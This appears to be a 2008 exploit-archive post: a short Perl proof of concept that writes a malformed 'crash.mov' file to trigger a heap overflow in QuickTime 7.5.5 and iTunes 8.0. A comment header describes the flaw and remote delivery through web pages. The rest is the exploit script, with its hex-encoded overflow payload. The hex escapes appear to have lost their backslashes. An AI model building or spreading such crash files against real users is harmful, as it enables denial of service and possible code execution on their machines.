quickitunes-oveflow.txt
Posted on 17 September 2008
############################################################################### # Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash # Vendor: http://www.apple.com/ # Risk : high # # The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player. # This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding # to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a # remote crash on firefox, IE and any browser using the Quicktime plugin. # Code execution may be possible. my $payload = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x3f". "x3ex0dx0ax3cx3fx71x75x69x63x6bx74x69x6dx65x20x74x79x70x65x3d". "x22x61x70x70x6cx69x63x61x74x69x6fx6ex2fx78x2dx71x75x69x63x6b". "x74x69x6dx65x2dx6dx65x64x69x61x2dx6cx69x6ex6bx20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20". "x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x22x3fx3e". "x0dx0ax3cx65x6dx62x65x64x20x73x72x63x3dx22x72x74x73x70x3ax2f". "x2fx6ex6fx73x69x74x65x2ex63x6fx6dx2fx6ex6fx76x69x64x7ax2ex6d". "x6fx76x22x20x61x75x74x6fx70x6cx61x79x3dx22x77x68x61x74x65x76". "x65x72x22x20x2fx3ex00"; my $file="crash.mov"; open(my $file, ">>$file") or die "Cannot open $file: $!"; print $file $payload; close($file);
